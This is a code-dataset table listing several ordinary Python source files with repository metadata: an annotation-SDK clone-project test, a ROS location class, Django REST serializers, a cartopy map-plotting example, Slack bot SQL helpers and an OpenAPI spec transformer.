hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8e65daebe577c08239034ca2c192e6c446ad91d9 | 5,865 | py | Python | tests/integration/test_clone_project.py | superannotateai/superannotate-python-sdk | e2ce848b61efed608265fa64f3781fd5a17c929b | [
"MIT"
] | 26 | 2020-09-25T06:25:06.000Z | 2022-01-30T16:44:07.000Z | tests/integration/test_clone_project.py | superannotateai/superannotate-python-sdk | e2ce848b61efed608265fa64f3781fd5a17c929b | [
"MIT"
] | 12 | 2020-12-21T19:59:48.000Z | 2022-01-21T10:32:07.000Z | tests/integration/test_clone_project.py | superannotateai/superannotate-python-sdk | e2ce848b61efed608265fa64f3781fd5a17c929b | [
"MIT"
] | 11 | 2020-09-17T13:39:19.000Z | 2022-03-02T18:12:29.000Z | import os
from os.path import dirname
from unittest import TestCase
import pytest
import src.superannotate as sa
class TestCloneProject(TestCase):
PROJECT_NAME_1 = "test_create_like_project_1"
PROJECT_NAME_2 = "test_create_like_project_2"
PROJECT_DESCRIPTION = "desc"
PROJECT_TYPE = "Vector"
IMAGE_QUALITY = "original"
PATH_TO_URLS = "data_set/attach_urls.csv"
def setUp(self, *args, **kwargs):
self.tearDown()
self._project_1 = sa.create_project(
self.PROJECT_NAME_1, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE
)
def tearDown(self) -> None:
sa.delete_project(self.PROJECT_NAME_1)
sa.delete_project(self.PROJECT_NAME_2)
def test_create_like_project(self):
_, _, _ = sa.attach_image_urls_to_project(
self.PROJECT_NAME_1,
os.path.join(dirname(dirname(__file__)), self.PATH_TO_URLS),
)
sa.create_annotation_class(
self.PROJECT_NAME_1,
"rrr",
"#FFAAFF",
[
{
"name": "tall",
"is_multiselect": 0,
"attributes": [{"name": "yes"}, {"name": "no"}],
},
{
"name": "age",
"is_multiselect": 0,
"attributes": [{"name": "young"}, {"name": "old"}],
},
],
)
sa.set_project_default_image_quality_in_editor(self.PROJECT_NAME_1,self.IMAGE_QUALITY)
sa.set_project_workflow(
self.PROJECT_NAME_1,
[
{
"step": 1,
"className": "rrr",
"tool": 3,
"attribute": [
{
"attribute": {
"name": "young",
"attribute_group": {"name": "age"},
}
},
{
"attribute": {
"name": "yes",
"attribute_group": {"name": "tall"},
}
},
],
}
],
)
new_project = sa.clone_project(
self.PROJECT_NAME_2, self.PROJECT_NAME_1, copy_contributors=True
)
source_project = sa.get_project_metadata(self.PROJECT_NAME_1)
self.assertEqual(new_project['upload_state'], source_project['upload_state'])
new_settings = sa.get_project_settings(self.PROJECT_NAME_2)
image_quality = None
for setting in new_settings:
if setting["attribute"].lower() == "imagequality":
image_quality = setting["value"]
break
self.assertEqual(image_quality,self.IMAGE_QUALITY)
self.assertEqual(new_project["description"], self.PROJECT_DESCRIPTION)
self.assertEqual(new_project["type"].lower(), "vector")
ann_classes = sa.search_annotation_classes(self.PROJECT_NAME_2)
self.assertEqual(len(ann_classes), 1)
self.assertEqual(ann_classes[0]["name"], "rrr")
self.assertEqual(ann_classes[0]["color"], "#FFAAFF")
new_workflow = sa.get_project_workflow(self.PROJECT_NAME_2)
self.assertEqual(len(new_workflow), 1)
self.assertEqual(new_workflow[0]["className"], "rrr")
self.assertEqual(new_workflow[0]["tool"], 3)
self.assertEqual(len(new_workflow[0]["attribute"]), 2)
self.assertEqual(new_workflow[0]["attribute"][0]["attribute"]["name"], "young")
self.assertEqual(
new_workflow[0]["attribute"][0]["attribute"]["attribute_group"]["name"],
"age",
)
self.assertEqual(new_workflow[0]["attribute"][1]["attribute"]["name"], "yes")
self.assertEqual(
new_workflow[0]["attribute"][1]["attribute"]["attribute_group"]["name"],
"tall",
)
class TestCloneProjectAttachedUrls(TestCase):
PROJECT_NAME_1 = "TestCloneProjectAttachedUrls_1"
PROJECT_NAME_2 = "TestCloneProjectAttachedUrls_2"
PROJECT_DESCRIPTION = "desc"
PROJECT_TYPE = "Document"
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
def setUp(self, *args, **kwargs):
self.tearDown()
self._project_1 = sa.create_project(
self.PROJECT_NAME_1, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE
)
def tearDown(self) -> None:
sa.delete_project(self.PROJECT_NAME_1)
sa.delete_project(self.PROJECT_NAME_2)
def test_create_like_project(self):
sa.create_annotation_class(
self.PROJECT_NAME_1,
"rrr",
"#FFAAFF",
[
{
"name": "tall",
"is_multiselect": 0,
"attributes": [{"name": "yes"}, {"name": "no"}],
},
{
"name": "age",
"is_multiselect": 0,
"attributes": [{"name": "young"}, {"name": "old"}],
},
],
)
new_project = sa.clone_project(
self.PROJECT_NAME_2, self.PROJECT_NAME_1, copy_contributors=True
)
self.assertEqual(new_project["description"], self.PROJECT_DESCRIPTION)
self.assertEqual(new_project["type"].lower(), "document")
ann_classes = sa.search_annotation_classes(self.PROJECT_NAME_2)
self.assertEqual(len(ann_classes), 1)
self.assertEqual(ann_classes[0]["name"], "rrr")
self.assertEqual(ann_classes[0]["color"], "#FFAAFF")
self.assertIn("Workflow copy is deprecated for Document projects.",self._caplog.text)
| 35.762195 | 94 | 0.539301 | 574 | 5,865 | 5.207317 | 0.1777 | 0.103045 | 0.100368 | 0.064236 | 0.619605 | 0.552024 | 0.529274 | 0.517899 | 0.45634 | 0.45634 | 0 | 0.014392 | 0.336573 | 5,865 | 163 | 95 | 35.981595 | 0.753791 | 0 | 0 | 0.430556 | 0 | 0 | 0.139471 | 0.023188 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.048611 | false | 0 | 0.034722 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e68d491045b46e0d5c3609fa40d0f8cbf83aabf | 3,106 | py | Python | src/image_caption_machine/world/place.py | brandontrabucco/ros-image-captioner | 5fd18317f2ec600cdc61628028292a22eef45fc2 | [
"MIT"
] | 3 | 2018-09-08T10:28:59.000Z | 2019-09-08T00:11:33.000Z | src/image_caption_machine/world/place.py | brandontrabucco/ros-image-captioner | 5fd18317f2ec600cdc61628028292a22eef45fc2 | [
"MIT"
] | null | null | null | src/image_caption_machine/world/place.py | brandontrabucco/ros-image-captioner | 5fd18317f2ec600cdc61628028292a22eef45fc2 | [
"MIT"
] | 2 | 2019-04-17T17:24:28.000Z | 2019-06-10T18:16:44.000Z | """Author: Brandon Trabucco.
Utility class for loading and managing locations in the robot's map.
"""
import json
import math
import rospy
from rt_msgs.msg import Odom
from std_msgs.msg import Header
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseStamped
from tf.transformations import euler_from_quaternion
from image_caption_machine.msg import WorldPlace
from image_caption_machine.convert.message import convert_ros_message_to_dictionary
from image_caption_machine.convert.message import convert_dictionary_to_ros_message
class Place(object):
"""Utility class for managing physycal naed locations.
"""
def __init__(self, name="default", pose_stamped=PoseStamped(
Header(0, rospy.Time(secs=0, nsecs=0), "None"),
Pose(Point(0.0, 0.0, 0.0),
Quaternion(0.0, 0.0, 0.0, 0.0))),
x=None, y=None,
json=None, msg=None):
"""Initialize the class with default parameters.
Args:
name: str REQUIRED
pose_stamped: PoseStamped REQUIRED
x: float
y: float
json: {name: "...", pose_stamped: {...}}
msg: WorldPlace message
"""
self.name = name
self.pose_stamped = pose_stamped
if x is not None:
self.pose_stamped.pose.position.x = x
if y is not None:
self.pose_stamped.pose.position.y = y
if json is not None:
self.json = json
if msg is not None:
self.msg = msg
@property
def json(self):
"""Serialize the place to json.
"""
return {"name": self.name, "pose_stamped":
convert_ros_message_to_dictionary(self.pose_stamped)}
@json.setter
def json(self, val):
"""Load json into the odom object.
"""
self.name = val["name"]
self.pose_stamped = convert_dictionary_to_ros_message(
"geometry_msgs/PoseStamped", val["pose_stamped"])
@property
def msg(self):
"""Utility to convert Place() to WorldPlace message.
"""
return WorldPlace(name=self.name, pose_stamped=self.pose_stamped)
@msg.setter
def msg(self, val):
"""Utility to convert WorldPlace message to Place().
"""
self.name = val.name
self.pose_stamped = val.pose_stamped
@property
def x(self):
"""Helper to get the x position.
"""
return self.pose_stamped.pose.position.x
@property
def y(self):
"""Helper to get the y position.
"""
return self.pose_stamped.pose.position.y
def to(self, other):
"""Helper to get the length to another place.
Args:
other: Place() object
"""
dx = self.x - other.x
dy = self.y - other.y
return math.sqrt((dx * dx) + (dy * dy))
def __str__(self):
"""Helper to convert the object to string.
"""
return self.name
| 24.650794 | 83 | 0.603348 | 397 | 3,106 | 4.579345 | 0.219144 | 0.10286 | 0.016502 | 0.017602 | 0.366337 | 0.182618 | 0.177118 | 0.094609 | 0 | 0 | 0 | 0.007805 | 0.298777 | 3,106 | 125 | 84 | 24.848 | 0.826905 | 0.245654 | 0 | 0.068966 | 0 | 0 | 0.03098 | 0.01139 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155172 | false | 0 | 0.224138 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e69d02ee0597be4c48dd1fc7fd8cd5d2f553e35 | 2,238 | py | Python | joplin_web/api/serializers.py | kuyper/joplin-web | 7a13b75cbb55741ddfb58767af34c7ad164fec11 | [
"BSD-3-Clause"
] | null | null | null | joplin_web/api/serializers.py | kuyper/joplin-web | 7a13b75cbb55741ddfb58767af34c7ad164fec11 | [
"BSD-3-Clause"
] | null | null | null | joplin_web/api/serializers.py | kuyper/joplin-web | 7a13b75cbb55741ddfb58767af34c7ad164fec11 | [
"BSD-3-Clause"
] | 1 | 2019-12-13T15:18:58.000Z | 2019-12-13T15:18:58.000Z | from rest_framework import serializers
from joplin_web.models import Folders, Notes, Tags, NoteTags, Version
class FoldersSerializer(serializers.ModelSerializer):
nb_notes = serializers.IntegerField(read_only=True)
class Meta:
fields = ('id', 'title', 'parent_id', 'nb_notes', 'created_time')
model = Folders
class NotesSerializer(serializers.ModelSerializer):
parent = FoldersSerializer(read_only=True)
parent_id = serializers.PrimaryKeyRelatedField(queryset=Folders.objects.using('joplin').all(),
source='folders',
write_only=True)
class Meta:
fields = ('id', 'parent_id', 'parent', 'title', 'body',
'is_todo', 'todo_due',
'created_time', 'updated_time',
'source', 'source_application',
'latitude', 'longitude', 'altitude',
'author')
model = Notes
class TagsSerializer(serializers.ModelSerializer):
nb_notes = serializers.IntegerField(read_only=True)
class Meta:
fields = '__all__'
model = Tags
class NoteTagsSerializer(serializers.ModelSerializer):
note = NotesSerializer(read_only=True)
tag = TagsSerializer(read_only=True)
note_id = serializers.PrimaryKeyRelatedField(
queryset=Notes.objects.using('joplin').all(), source='notes', write_only=True)
tag_id = serializers.PrimaryKeyRelatedField(
queryset=Tags.objects.using('joplin').all(), source='tags', write_only=True)
class Meta:
fields = ('id', 'note_id', 'note', 'tag_id', 'tag', 'created_time',
'updated_time', 'user_created_time', 'user_updated_time',
'encryption_cipher_text', 'encryption_applied')
model = NoteTags
class NoteTagsByNoteIdSerializer(serializers.ModelSerializer):
tag = TagsSerializer(read_only=True)
class Meta:
fields = ('tag',)
model = NoteTags
class VersionSerializer(serializers.ModelSerializer):
version = serializers.IntegerField()
class Meta:
fields = ('version', )
read_only_fields = ('version', )
model = Version
| 29.84 | 98 | 0.628239 | 209 | 2,238 | 6.526316 | 0.277512 | 0.052786 | 0.052786 | 0.062317 | 0.280059 | 0.18695 | 0.165689 | 0.121701 | 0.121701 | 0.121701 | 0 | 0 | 0.259607 | 2,238 | 74 | 99 | 30.243243 | 0.823174 | 0 | 0 | 0.25 | 0 | 0 | 0.14924 | 0.00983 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e6ab08948cc89750d63dd9c07947a6c58786c2f | 5,859 | py | Python | Plots/MapProjections/NCL_sat_3.py | learn2free/GeoCAT-examples | 3ac152a767e78a362a8ebb6f677005f3de320ca6 | [
"Apache-2.0"
] | 1 | 2021-05-09T02:54:10.000Z | 2021-05-09T02:54:10.000Z | Plots/MapProjections/NCL_sat_3.py | learn2free/GeoCAT-examples | 3ac152a767e78a362a8ebb6f677005f3de320ca6 | [
"Apache-2.0"
] | null | null | null | Plots/MapProjections/NCL_sat_3.py | learn2free/GeoCAT-examples | 3ac152a767e78a362a8ebb6f677005f3de320ca6 | [
"Apache-2.0"
] | null | null | null | """
NCL_sat_3.py
================
This script illustrates the following concepts:
- zooming into an orthographic projection
- plotting filled contour data on an orthographic map
- plotting lat/lon tick marks on an orthographic map
See following URLs to see the reproduced NCL plot & script:
- Original NCL script: https://www.ncl.ucar.edu/Applications/Scripts/sat_3.ncl
- Original NCL plot: https://www.ncl.ucar.edu/Applications/Images/sat_3_lg.png
"""
import cartopy.crs as ccrs
import cartopy.feature as cfeature
import geocat.datafiles as gdf
###############################################################################
# Import packages:
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
import numpy as np
import xarray as xr
from geocat.viz import util as gvutil
###############################################################################
# Define a helper function for plotting lat/lon ticks on an orthographic plane
def plotOrthoTicks(coords, loc):
if loc == 'zero':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN}'.format(lon),
va='bottom',
ha='center',
transform=ccrs.PlateCarree())
if loc == 'left':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} N '.format(lat),
va='center',
ha='right',
transform=ccrs.PlateCarree())
if loc == 'right':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} N '.format(lat),
va='center',
ha='left',
transform=ccrs.PlateCarree())
if loc == 'top':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} W '.format(-lon),
va='bottom',
ha='center',
transform=ccrs.PlateCarree())
if loc == 'bottom':
for lon, lat in coords:
ax.text(lon,
lat,
'{0}\N{DEGREE SIGN} W '.format(-lon),
va='top',
ha='center',
transform=ccrs.PlateCarree())
###############################################################################
# Read in data:
# Open a netCDF data file using xarray default engine and
# load the data into xarrays
ds = xr.open_dataset(gdf.get('netcdf_files/h_avg_Y0191_D000.00.nc'),
decode_times=False)
# Extract a slice of the data
t = ds.T.isel(time=0, z_t=0)
###############################################################################
# Plot:
plt.figure(figsize=(8, 8))
# Create an axis with an orthographic projection
ax = plt.axes(projection=ccrs.Orthographic(central_longitude=-35,
central_latitude=60),
anchor='C')
# Set extent of map
ax.set_extent((-80, -10, 30, 80), crs=ccrs.PlateCarree())
# Add natural feature to map
ax.coastlines(resolution='110m')
ax.add_feature(cfeature.LAND, facecolor='lightgray', zorder=3)
ax.add_feature(cfeature.COASTLINE, linewidth=0.2, zorder=3)
ax.add_feature(cfeature.LAKES,
edgecolor='black',
linewidth=0.2,
facecolor='white',
zorder=4)
# plot filled contour data
heatmap = t.plot.contourf(ax=ax,
transform=ccrs.PlateCarree(),
levels=80,
vmin=-1.5,
vmax=28.5,
cmap='RdGy',
add_colorbar=False,
zorder=1)
# Add color bar
cbar_ticks = np.arange(-1.5, 31.5, 3)
cbar = plt.colorbar(heatmap,
orientation='horizontal',
extendfrac=[0, .1],
shrink=0.8,
aspect=14,
pad=0.05,
extendrect=True,
ticks=cbar_ticks)
cbar.ax.tick_params(labelsize=10)
# Get rid of black outline on colorbar
cbar.outline.set_visible(False)
# Set main plot title
main = r"$\bf{Example}$" + " " + r"$\bf{of}$" + " " + r"$\bf{Zooming}$" + \
" " + r"$\bf{a}$" + " " + r"$\bf{Sat}$" + " " + r"$\bf{Projection}$"
# Set plot subtitles using NetCDF metadata
left = t.long_name
right = t.units
# Use geocat-viz function to create main, left, and right plot titles
title = gvutil.set_titles_and_labels(ax,
maintitle=main,
maintitlefontsize=16,
lefttitle=left,
lefttitlefontsize=14,
righttitle=right,
righttitlefontsize=14,
xlabel="",
ylabel="")
# Plot gridlines
gl = ax.gridlines(color='black', linewidth=0.2, zorder=2)
# Set frequency of gridlines in the x and y directions
gl.xlocator = mticker.FixedLocator(np.arange(-180, 180, 15))
gl.ylocator = mticker.FixedLocator(np.arange(-90, 90, 15))
# Manually plot tick marks.
# NCL has automatic tick mark placement on orthographic projections,
# Python's cartopy module does not have this functionality yet.
plotOrthoTicks([(0, 81.7)], 'zero')
plotOrthoTicks([(-80, 30), (-76, 20), (-88, 40), (-107, 50)], 'left')
plotOrthoTicks([(-9, 30), (-6, 40), (1, 50), (13, 60)], 'right')
plotOrthoTicks([(-120, 60), (-60, 82.5)], 'top')
plotOrthoTicks([(-75, 16.0), (-60, 25.0), (-45, 29.0), (-30, 29.5),
(-15, 26.5)], 'bottom')
plt.tight_layout()
plt.show()
| 33.48 | 82 | 0.497013 | 656 | 5,859 | 4.396341 | 0.397866 | 0.020804 | 0.049931 | 0.019071 | 0.197642 | 0.166436 | 0.126907 | 0.126907 | 0.126907 | 0.126907 | 0 | 0.040806 | 0.330773 | 5,859 | 174 | 83 | 33.672414 | 0.694721 | 0.206861 | 0 | 0.287037 | 0 | 0 | 0.082501 | 0.008134 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009259 | false | 0 | 0.074074 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e6c93847574069cca7db77ebf31e5ff0a8a00ef | 2,047 | py | Python | bot/team.py | mcfunley/clippingsbot | 2954d5b5aa854b57d062a98e2133d258f9fd86c7 | [
"MIT"
] | 1 | 2019-02-06T16:52:05.000Z | 2019-02-06T16:52:05.000Z | bot/team.py | mcfunley/clippingsbot | 2954d5b5aa854b57d062a98e2133d258f9fd86c7 | [
"MIT"
] | null | null | null | bot/team.py | mcfunley/clippingsbot | 2954d5b5aa854b57d062a98e2133d258f9fd86c7 | [
"MIT"
] | null | null | null | from bot import db
def save(data):
sql = """
insert into clippingsbot.teams (
team_id, access_token, user_id, team_name, scope
) values (
:team_id, :access_token, :user_id, :team_name, :scope
) on conflict (team_id) do update
set scope = excluded.scope,
access_token = excluded.access_token,
user_id = excluded.user_id,
team_name = excluded.team_name
returning team_id
"""
return db.scalar(sql, **data)
def find(team_id):
return db.find_one(
'select * from clippingsbot.teams where team_id = :team_id',
team_id = team_id)
def watch(team, channel_id, pattern, pattern_id):
sql = """
insert into clippingsbot.team_patterns (
team_id, channel_id, pattern_id, display_pattern
)
values (:team_id, :channel_id, :pattern_id, :pattern)
on conflict (team_id, channel_id, pattern_id) do nothing
"""
db.execute(
sql, team_id=team['team_id'], channel_id=channel_id,
pattern_id=pattern_id, pattern=pattern
)
def find_patterns(team, channel_id):
sql = """
select * from
clippingsbot.team_patterns
where team_id = :team_id and channel_id = :channel_id
"""
return db.find(sql, team_id=team['team_id'], channel_id=channel_id)
def count_other_channel_patterns(team, channel_id):
sql = """
select count(*)
from clippingsbot.team_patterns
where team_id = :team_id and channel_id != :channel_id
"""
return db.scalar(sql, team_id=team['team_id'], channel_id=channel_id)
def count_patterns(team):
sql = """
select count(*) from clippingsbot.team_patterns where team_id = :team_id
"""
return db.scalar(sql, team_id=team['team_id'])
def stop(team, channel_id, pattern):
sql = """
delete from clippingsbot.team_patterns
where team_id = :team_id and channel_id = :channel_id
and lower(display_pattern) = lower(:pattern)
"""
db.execute(sql, team_id=team['team_id'], channel_id=channel_id,
pattern=pattern)
| 28.041096 | 76 | 0.662921 | 283 | 2,047 | 4.5053 | 0.162544 | 0.141176 | 0.120784 | 0.065882 | 0.615686 | 0.611765 | 0.465882 | 0.465882 | 0.465882 | 0.409412 | 0 | 0 | 0.225696 | 2,047 | 72 | 77 | 28.430556 | 0.804416 | 0 | 0 | 0.241379 | 0 | 0 | 0.579873 | 0.085002 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12069 | false | 0 | 0.017241 | 0.017241 | 0.224138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e6d24e204761284a5dd415da03add5895524b76 | 3,947 | py | Python | meeshkan/nlp/spec_transformer.py | meeshkan/meeshkan-nlp | 63ef1e0ef31fd9c2031c89e9fd6ca3fc46eef13e | [
"MIT"
] | 1 | 2020-04-02T08:02:33.000Z | 2020-04-02T08:02:33.000Z | meeshkan/nlp/spec_transformer.py | meeshkan/meeshkan-nlp | 63ef1e0ef31fd9c2031c89e9fd6ca3fc46eef13e | [
"MIT"
] | 9 | 2020-03-24T21:09:16.000Z | 2020-07-24T09:58:11.000Z | meeshkan/nlp/spec_transformer.py | meeshkan/meeshkan-nlp | 63ef1e0ef31fd9c2031c89e9fd6ca3fc46eef13e | [
"MIT"
] | null | null | null | import typing
from operator import itemgetter
from http_types import HttpExchange
from jsonpath_rw import parse
from openapi_typed_2 import OpenAPIObject, convert_from_openapi, convert_to_openapi
from meeshkan.nlp.data_extractor import DataExtractor
from meeshkan.nlp.entity_extractor import EntityExtractor
from meeshkan.nlp.ids.id_classifier import IdClassifier, IdType
from meeshkan.nlp.operation_classifier import OperationClassifier
from meeshkan.nlp.spec_normalizer import SpecNormalizer
class SpecTransformer:
def __init__(
self,
extractor: EntityExtractor,
path_analyzer,
normalizer: SpecNormalizer,
id_classifier: IdClassifier,
):
self._extractor = extractor
self._path_analyzer = path_analyzer
self._normalizer = normalizer
self._operation_classifier = OperationClassifier()
self._id_classifier = id_classifier
self._data_extractor = DataExtractor()
def optimize_spec(
self, spec: OpenAPIObject, recordings: typing.List[HttpExchange]
) -> OpenAPIObject:
entity_paths = self._extractor.get_entity_from_spec(spec)
spec_dict = convert_from_openapi(spec)
datapaths, spec_dict = self._normalizer.normalize(spec_dict, entity_paths)
grouped_records = self._data_extractor.group_records(spec_dict, recordings)
spec_dict = self._replace_path_ids(spec_dict, grouped_records)
spec_dict = self._operation_classifier.fill_operations(spec_dict)
data = self._data_extractor.extract_data(datapaths, grouped_records)
spec_dict = self._add_entity_ids(spec_dict, data)
spec_dict = self._inject_data(spec_dict, data)
return convert_to_openapi(spec_dict)
def _replace_path_ids(self, spec, grouped_records):
for pathname, path_record in grouped_records.items():
for param in reversed(path_record.path_args):
res = self._id_classifier.by_values(path_record.path_arg_values[param])
if res != IdType.UNKNOWN:
path_item = spec["paths"].pop(pathname)
for param_desc in path_item["parameters"]:
if param_desc["name"] == param:
param_desc["name"] = "id"
param_desc["x-meeshkan-id-type"] = res.value
break
pathname = pathname.replace("{{{}}}".format(param), "{id}")
spec["paths"][pathname] = path_item
break
return spec
def _add_entity_ids(self, spec_dict, data):
for name, values in data.items():
schema = spec_dict["components"]["schemas"][name]
potential_ids = []
for property in schema["properties"]:
name_score = self._id_classifier.by_name(name, property)
if name_score > 0:
res = self._id_classifier.by_values(
(v[property] for v in values if property in v)
)
if res != IdType.UNKNOWN:
potential_ids.append((property, res, name_score))
if len(potential_ids) > 0:
idx = max(potential_ids, key=itemgetter(2))
schema["x-meeshkan-id-path"] = idx[0]
schema["x-meeshkan-id-type"] = idx[1].value
return spec_dict
def _inject_data(self, spec_dict, data):
spec_dict["x-meeshkan-data"] = {}
for name, values in data.items():
expr = parse(spec_dict["components"]["schemas"][name]["x-meeshkan-id-path"])
injected_values = dict()
for val in values:
idx = expr.find(val)
if len(idx) > 0:
injected_values[idx[0].value] = val
spec_dict["x-meeshkan-data"][name] = list(injected_values.values())
return spec_dict
